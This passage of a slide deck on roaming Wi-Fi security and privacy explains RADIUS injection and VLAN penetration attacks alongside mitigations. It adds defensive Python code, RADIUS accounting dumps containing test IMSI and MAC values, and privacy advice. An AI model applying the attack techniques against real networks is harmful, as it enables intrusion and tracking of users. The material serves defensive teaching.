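With the 1-5 second round trip the slide quotes, even the per-station budget here (10 failures in 5 minutes) is several times what a legitimately misconfigured device produces, so the limiter only ever fires on deliberate guessing. Note the cost of the design: a real user whose device has just been blocked is rejected even with the right password until the window passes.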
  • 16. Injection attack (diagram: Visited organisation (VO) Wi-Fi network, NAS, attacker’s device with outer identity <exploit>@victim.domain, inner identity <exploit>@victim.domain | <exploit>, password: <exploit>)
    1) Attacker inserts the exploit (log4j, SQL, JavaScript, XSS, HTML …) payload into the outer or inner identity or the password instead of the credentials
    2) Any device, RADIUS server, centralised log system, web based user interface etc. which processes or displays the outer identity is exposed to the exploit.
    3) victim.domain systems processing the outer/inner identity and password are exposed to the exploit
  • 17. Injection attack comments and mitigation
    Comments
    ● There have not yet been successful public cases or occurrences of this attack
    ● In eduroam this was tested when the log4j exploit was published, but just placing the log4j exploit in the RADIUS request did not work
    ● Maximum length of a RADIUS attribute is 253 characters, which limits exploits
    Mitigation
    ● Sanitising inputs in software
    ● Sanitising User-Name (outer identity), inner identity and password in RADIUS servers
      ○ Done sometimes, for example for whitespace in User-Name
      ○ Done also sometimes for specific characters, but extra care needs to be taken not to break legit requests
      ○ Only the home organisation is exposed to the exploit placed in the inner identity or password
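The two sanitising steps from the slide carried out on the User-Name, as an added example rather than the behaviour of any RADIUS server: whitespace trimming and a 253-octet limit on the way in, and an escaping step on the way out to logs and web UIs, which is where the slide places the exposure. Rejecting control characters while keeping non-ASCII letters is a defensive choice of this example, made so that legitimate NAIs (RFC 7542 allows UTF-8) are not broken:

```python
"""Sanitising and log-escaping the User-Name (outer identity) before it is
proxied, matched or logged. Added illustration; the character rules below
are a defensive choice, not a RADIUS or eduroam specification."""
import unicodedata

MAX_ATTR_OCTETS = 253   # maximum RADIUS attribute value length


def sanitise_user_name(raw):
    """Return (value, reason): the cleaned User-Name with reason None, or None with a reason."""
    if isinstance(raw, (bytes, bytearray)):
        try:
            raw = bytes(raw).decode("utf-8")
        except UnicodeDecodeError:
            return None, "User-Name is not valid UTF-8"
    value = raw.strip()                       # leading/trailing whitespace is a common client slip
    if not value:
        return None, "empty User-Name"
    if len(value.encode("utf-8")) > MAX_ATTR_OCTETS:
        return None, f"User-Name longer than {MAX_ATTR_OCTETS} octets"
    if any(unicodedata.category(ch) in ("Cc", "Cs") for ch in value):
        return None, "User-Name contains control characters"
    # Non-ASCII letters are legitimate in an NAI (RFC 7542), so they are kept.
    return value, None


def log_escape(value):
    """Render a User-Name for log files and web UIs: only printable ASCII
    survives unescaped, so line breaks, control characters and quotes cannot
    forge log lines or break out of a quoted field."""
    out = []
    for ch in value:
        code = ord(ch)
        if ch == "\\":
            out.append("\\\\")
        elif ch == '"':
            out.append('\\"')
        elif 0x20 <= code < 0x7F:
            out.append(ch)
        elif code < 0x100:
            out.append(f"\\x{code:02x}")
        else:
            out.append(f"\\u{code:04x}")
    return "".join(out)


if __name__ == "__main__":
    for sample in ("  anonymous@example.com ", "käyttäjä@example.fi", "bad\x00name@example.com", "x" * 260):
        value, reason = sanitise_user_name(sample)
        print(repr(sample[:30]), "->", reason or log_escape(value))
```

The escaping is only for the copy that gets displayed or written to a log; the value used for realm routing and authentication stays as received, which is what keeps legitimate requests intact.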
  • 18. VLAN penetration attack (diagram: Visited organisation (VO) Wi-Fi network, NAS, attacker’s device with outer identity anonymous@attacker.com, inner identity realusername@attacker.com and password: realpassword)
    1) Attacker tries to authenticate to the Visited Organisation Wi-Fi network using roaming credentials from an attacker controlled RADIUS server
    2) Attacker’s RADIUS server accepts the attacker’s authentication and includes in its response VLAN assignment attributes targeted at the VO’s Wi-Fi equipment.
    3) If the VO RADIUS server does not strip the VLAN assignment from responses coming from the roaming federation, the attributes are passed to the Wi-Fi network equipment as they are
    4) If the VO uses VLAN assignment in its Wi-Fi network, the Wi-Fi network equipment drops the attacker’s device into the VLAN defined by the attacker’s RADIUS server.
    Roaming federation servers often clean at least the standard VLAN assignment attributes from the request but mostly pass all RADIUS attributes through.
  • 19. VLAN penetration attack mitigation
    ● Strip standard and vendor specific VLAN assignment RADIUS attributes in the own organisation RADIUS server
    ● Strip attributes in the other federation RADIUS servers
    ● Take care what organisations can join the roaming federation and in identifying them
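The visited organisation's side of the roaming flow from slide 8 together with the first mitigation on this slide, as an added example that is not from the deck or from any RADIUS server: route by realm, and strip VLAN assignment attributes from whatever the federation default route returns before the NAS sees it. The realms, the guest VLAN policy and the in-memory stand-ins for the local backend and the federation are constructed; real packets carry tagged tunnel attributes and shared secrets, which this model leaves out:

```python
"""Model of the visited organisation (VO) RADIUS server in the roaming flow:
route by realm (own users locally, everything else to the federation default
route) and strip VLAN assignment attributes from whatever comes back.
Added illustration with constructed realms and in-memory stand-ins for the
local backend and the federation proxy."""
from dataclasses import dataclass, field


@dataclass
class Packet:
    code: str
    attrs: list = field(default_factory=list)   # [(attribute name, value), ...]


LOCAL_REALMS = {"vo.example"}                  # constructed: the VO's own realm

# RFC 2868 tunnel attributes used for VLAN assignment (RFC 3580) plus the
# vendor attributes seen in the accounting dumps in this deck; the vendor
# role attribute is stripped too because it selects policy just like a VLAN.
VLAN_ATTRS = {"Tunnel-Type", "Tunnel-Medium-Type", "Tunnel-Private-Group-ID",
              "Aruba-User-Vlan", "Aruba-User-Role"}

# What the VO itself wants roaming visitors to get (constructed policy).
GUEST_VLAN = [("Tunnel-Type", "VLAN"), ("Tunnel-Medium-Type", "IEEE-802"),
              ("Tunnel-Private-Group-ID", "guest")]


def realm_of(user_name: str) -> str:
    """Realm part of an NAI (text after the last '@'), lower-cased; '' if none."""
    return user_name.rpartition("@")[2].lower() if "@" in user_name else ""


def strip_vlan_attrs(pkt: Packet):
    """Return (cleaned packet, list of removed attributes)."""
    kept = [(n, v) for n, v in pkt.attrs if n not in VLAN_ATTRS]
    removed = [(n, v) for n, v in pkt.attrs if n in VLAN_ATTRS]
    return Packet(pkt.code, kept), removed


def handle_access_request(req: Packet, local_auth, federation) -> Packet:
    """Decide the reply the NAS sees for one Access-Request."""
    user = dict(req.attrs).get("User-Name", "")
    if realm_of(user) in LOCAL_REALMS:
        return local_auth(req)                 # own users: own policy decides the VLAN
    reply, removed = strip_vlan_attrs(federation(req))
    if removed:
        print(f"stripped from federation reply for {user!r}: {removed}")
    if reply.code == "Access-Accept":
        reply.attrs.extend(GUEST_VLAN)         # VO policy, not the home server's
    return reply


if __name__ == "__main__":
    # Constructed federation reply carrying a VLAN and role chosen by the home server.
    def federation(req):
        return Packet("Access-Accept", [("Tunnel-Type", "VLAN"), ("Tunnel-Medium-Type", "IEEE-802"),
                                        ("Tunnel-Private-Group-ID", "1"), ("Aruba-User-Role", "admin"),
                                        ("Session-Timeout", "3600")])
    req = Packet("Access-Request", [("User-Name", "anonymous@other.example")])
    print(handle_access_request(req, lambda r: Packet("Access-Accept"), federation))
```

The strip happens on the response, where the slide places the exposure: a federation proxy that cleans requests but passes replies through leaves the VO's own server as the only place the attributes can still be removed.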
  • 21. You may have seen this on the Internet …
  • 22. It’s funny, because it’s true... (at least with these adjustments) (image: “MAC ADDRESS TRACKING YOUR DEVICE”)
  • 23. MAC addresses, we all got them...
    ● Most of the network interfaces on your device have a unique address called a MAC address
    ● Wi-Fi and Bluetooth interfaces may “broadcast” the address even if the interface is not in active use
  • 24. MAC addresses are used ...
    ● to identify devices and users
    ● to control access to the network
    ● to limit use of network resources
    ● to keep track of sessions
    ● to assign and track IP addresses
    ● to track devices => to track persons
  • 25. Wi-Fi devices send so called probe requests to find out what Wi-Fi networks are available, and they may do this even if Wi-Fi is turned off. Bluetooth devices respond to queries and may do their own probing as well. This makes it possible to track for example people and their movements in shopping malls => nice tracking business. (diagram labels: 7 people hanging near a certain store, a person’s path, recurring visitor)
  • 26. MAC address randomisation
    ● first done only in the probe requests
    ● has been extended to network connections
    ● is currently per Wi-Fi network (profile)
    ● is expected in the future to be time-based as well
    ● is enabled by default in Android 10, 11 and iOS/iPadOS 14+
  • 27. Check also globalreachtech.com WWW pages for more analysis of MAC address randomisation by Dr Chris Spencer
  • 28. Randomised MAC address does not stop tracking
    ● In most devices the randomised MAC address only changes when a network or profile is deleted and created again => recurring visitors can be identified at least within the same network
    ● In authenticated and roaming networks the MAC address does not really matter: User-Name and Chargeable-User-Identity can be used if these are not protected
    ● User-Name and Chargeable-User-Identity are sent in clear text
      ○ EAP-TLS with TLS<1.3, PEAP/EAP-TTLS, EAP-SIM / EAP-AKA / EAP-AKA’ without IMSI Privacy
    ● While WPA2/3 authentication protects RADIUS authentication with TLS, RADIUS accounting is sent in clear text
  • 29. EAP-SIM/EAP-AKA/EAP-AKA’ privacy
    EAP-SIM, EAP-AKA and EAP-AKA’ are SIM-based WiFi authentication methods used to achieve seamless offloading to carrier and partner WiFi. The International Mobile Subscriber Identifier (IMSI) derived from the SIM card is the unique identifier for each user. On the first connection to a WiFi network, the mobile device communicates its permanent subscriber identity information (IMSI), which is then sent to the home operator for authentication.
    Without IMSI Privacy features, this identity is sent in the clear. A potential 3rd party adversary installing a WiFi sniffer in the vicinity of such networks can harvest permanent identities and track users. This tracking can also be done by the venue or network owner when connecting to the WiFi network.
    Example: warning in iOS when joining WiFi without IMSI privacy in place
  • 30. RADIUS Accounting Start message
    e86bff00 Thu Feb 23 14:50:10 2023 594131: DEBUG: Packet dump:
    e86bff00 *** Received from 10.255.255.245 port 61503 ....
    e86bff00 Code: Accounting-Request
    e86bff00 Identifier: 1
    e86bff00 Authentic: <167>[<8>i+<250><208><242><12>A<179><226>d<183><183>S
    e86bff00 Attributes:
    e86bff00 Acct-Status-Type = Start
    e86bff00 NAS-IP-Address = 10.255.255.245
    e86bff00 User-Name = "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org"
    e86bff00 NAS-Port = 0
    e86bff00 NAS-Port-Type = Wireless-IEEE-802-11
    e86bff00 Calling-Station-Id = "aa2b0b553528"
    e86bff00 Called-Station-Id = "6026efcdcdc4"
    e86bff00 Framed-IP-Address = 172.16.145.111
    e86bff00 Acct-Multi-Session-Id = "AA2B0B553528-1677156607"
    e86bff00 Acct-Session-Id = "6026EF5CDC55-AA2B0B553528-63F76102-8F448"
    e86bff00 Acct-Delay-Time = 0
    e86bff00 Aruba-Essid-Name = "RS-TEST"
    e86bff00 Aruba-Location-Id = "rs-aruba-ap-1"
    e86bff00 Aruba-User-Vlan = 145
    e86bff00 Aruba-User-Role = "RS-TEST"
    e86bff00 Aruba-Device-Type = "NOFP"
    e86bff00 Acct-Authentic = RADIUS
    e86bff00 Service-Type = Login-User
    e86bff00 NAS-Identifier = "rs-aruba-ap-1"
    Note IMSI in the User-Name, MAC addresses, IP addresses, Session-Ids, Aruba vendor specific RADIUS attributes.
  • 31. RADIUS Accounting Stop message
    d5b39070 Thu Feb 23 14:53:52 2023 182291: DEBUG: Packet dump:
    d5b39070 *** Received from 10.255.255.245 port 61503 ....
    d5b39070 Code: Accounting-Request
    d5b39070 Identifier: 1
    d5b39070 Authentic: <188>9>g[<186><157>U|`<244><143>"<171><183><127>
    d5b39070 Attributes:
    d5b39070 Acct-Status-Type = Stop
    d5b39070 NAS-IP-Address = 10.255.255.245
    d5b39070 User-Name = "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org"
    d5b39070 NAS-Port = 0
    d5b39070 NAS-Port-Type = Wireless-IEEE-802-11
    d5b39070 Calling-Station-Id = "aa2b0b553528"
    d5b39070 Called-Station-Id = "6026efcdcdc4"
    d5b39070 Framed-IP-Address = 172.16.145.111
    d5b39070 Acct-Multi-Session-Id = "AA2B0B553528-1677156607"
    d5b39070 Acct-Session-Id = "6026EF5CDC55-AA2B0B553528-63F76102-8F448"
    d5b39070 Acct-Delay-Time = 0
    d5b39070 Aruba-Essid-Name = "RS-TEST"
    d5b39070 Aruba-Location-Id = "rs-aruba-ap-1"
    d5b39070 Aruba-User-Vlan = 145
    d5b39070 Aruba-User-Role = "RS-TEST"
    d5b39070 Aruba-Device-Type = "NOFP"
    d5b39070 Acct-Input-Octets = 35954
    d5b39070 Acct-Output-Octets = 855517
    d5b39070 Acct-Input-Packets = 549
    d5b39070 Acct-Output-Packets = 453
    d5b39070 Acct-Input-Gigawords = 0
    Note also one Location attribute. There are a lot more related attributes in the standardisation process, and under development is also a technology called Wi-Fi sensing, which probably also brings new attributes to RADIUS requests.
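The two dumps above read the way a privacy review would read them, as an added example that is not part of the deck: parse the "<id> Attribute = value" layout, flag every attribute that identifies or locates the user (the IMSI in User-Name, client and AP MAC addresses, the IP address, the session ids that embed a MAC, the location attribute), and pseudonymise those values with a keyed hash before the record is stored. The sample input is the Accounting Start dump from slide 30 (a test IMSI and lab addresses); the attribute classification and the HMAC key are choices of this example:

```python
"""Scan a RADIUS accounting packet dump for identity- and location-bearing
attributes, and pseudonymise them before the record is kept. The sample is
the Accounting Start dump from this deck (test IMSI and lab addresses); the
parsing follows that dump's "<id> Attribute = value" layout. Added
illustration, not part of the slides."""
import hashlib
import hmac
import re

SAMPLE_DUMP = """\
e86bff00 Code: Accounting-Request
e86bff00 Identifier: 1
e86bff00 Attributes:
e86bff00 Acct-Status-Type = Start
e86bff00 NAS-IP-Address = 10.255.255.245
e86bff00 User-Name = "0001012014020013@wlan.mnc001.mcc001.3gppnetwork.org"
e86bff00 NAS-Port = 0
e86bff00 NAS-Port-Type = Wireless-IEEE-802-11
e86bff00 Calling-Station-Id = "aa2b0b553528"
e86bff00 Called-Station-Id = "6026efcdcdc4"
e86bff00 Framed-IP-Address = 172.16.145.111
e86bff00 Acct-Multi-Session-Id = "AA2B0B553528-1677156607"
e86bff00 Acct-Session-Id = "6026EF5CDC55-AA2B0B553528-63F76102-8F448"
e86bff00 Acct-Delay-Time = 0
e86bff00 Aruba-Essid-Name = "RS-TEST"
e86bff00 Aruba-Location-Id = "rs-aruba-ap-1"
e86bff00 Aruba-User-Vlan = 145
e86bff00 Aruba-User-Role = "RS-TEST"
e86bff00 Aruba-Device-Type = "NOFP"
e86bff00 Acct-Authentic = RADIUS
e86bff00 Service-Type = Login-User
e86bff00 NAS-Identifier = "rs-aruba-ap-1"
"""

ATTR_LINE = re.compile(r'^\S+\s+([A-Za-z0-9-]+)\s*=\s*"?(.*?)"?\s*$')
# Permanent SIM identity: one-digit EAP method prefix (0 = EAP-AKA, 1 = EAP-SIM,
# 6 = EAP-AKA') followed by the 15-digit IMSI and the 3GPP realm.
IMSI_NAI = re.compile(r"^[016]\d{15}@wlan\.mnc\d{3}\.mcc\d{3}\.3gppnetwork\.org$", re.I)
MAC = re.compile(r"(?<![0-9a-f])[0-9a-f]{12}(?![0-9a-f])|([0-9a-f]{2}[:-]){5}[0-9a-f]{2}", re.I)

CLIENT_ID_ATTRS = {"Calling-Station-Id": "client MAC address",
                   "Chargeable-User-Identity": "stable per-user identifier",
                   "Framed-IP-Address": "client IP address"}
LOCATION_ATTRS = {"Called-Station-Id": "AP MAC address (location)",
                  "Aruba-Location-Id": "AP name (location)",
                  "NAS-Identifier": "AP name (location)"}


def parse_dump(text):
    """[(attribute, value)] from a Radiator-style packet dump; non-attribute lines are skipped."""
    return [(m.group(1), m.group(2)) for m in map(ATTR_LINE.match, text.splitlines()) if m]


def privacy_findings(attrs):
    """[(attribute, why it identifies or locates the user)] for one packet."""
    out = []
    for name, value in attrs:
        if name == "User-Name":
            if IMSI_NAI.match(value):
                out.append((name, "permanent subscriber identity (IMSI) in clear text"))
            elif not value.lower().startswith("anonymous"):
                out.append((name, "real username in clear text"))
        elif name in CLIENT_ID_ATTRS:
            out.append((name, CLIENT_ID_ATTRS[name]))
        elif name in LOCATION_ATTRS:
            out.append((name, LOCATION_ATTRS[name]))
        elif MAC.search(value):
            out.append((name, "embeds a MAC address"))
    return out


def pseudonymise(attrs, key: bytes):
    """Replace every flagged value with a keyed hash, so sessions of one device
    can still be correlated by whoever holds the key, while the raw IMSI, MAC
    and IP addresses never reach long-term storage."""
    flagged = {name for name, _ in privacy_findings(attrs)}
    result = []
    for name, value in attrs:
        if name in flagged:
            digest = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()[:16]
            result.append((name, f"pseudo:{digest}"))
        else:
            result.append((name, value))
    return result


if __name__ == "__main__":
    attrs = parse_dump(SAMPLE_DUMP)
    for name, why in privacy_findings(attrs):
        print(f"{name:24s} {why}")
    print(pseudonymise(attrs, key=b"constructed-example-key"))
```

Eight of the nineteen attributes in the Start message identify or locate the device, and all of them travel unencrypted unless the accounting stream is carried over RadSec, which is the reason the next slide lists both "don't send accounting if not required" and RadSec as mitigations.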
  • 32. How to protect privacy?
    ● Use MAC address randomisation
    ● Use anonymous outer identity in Wi-Fi configurations
    ● Don’t send RADIUS accounting if it is not required (eduroam recommendation)
    ● Use RadSec (RADIUS over TLS, RFC 6614) to protect both authentication and accounting (OpenRoaming requirement)
    ● Use EAP-TLS with TLSv1.3 support for client certificate authentication
    ● Use IMSI Privacy Protection supporting clients, server software and operator
  • 33. Adding RadSec to roam.fi roaming federation (diagram)
    ● Redundant roam.fi RADIUS service in public cloud, with two more instances added for inbound RadSec for roam.fi organisations and inbound/outbound OpenRoaming
    ● Connected via RADIUS: Radiator Auth.Fi (Enterprise Wi-Fi as a service), Tampere University RADIUS, other customers connecting via RADIUS, e.g. City of Seinäjoki, Seinäjoki education etc.
    ● Connection labels: inbound RadSec for roam.fi organisations, inbound OpenRoaming, outbound OpenRoaming
  • 34. Thank you, any questions?
    Slideshare (personal): slideshare.net/khuhtanen/
    Radiator Software webinars: radiatorsoftware.com/webinars/
    Mastodon (personal): @khuhtanen@infosec.exchange
    Twitter (personal): @khuhtanen
    Twitter (company): @RadiatorAAA
    Radiator Software: radiatorsoftware.com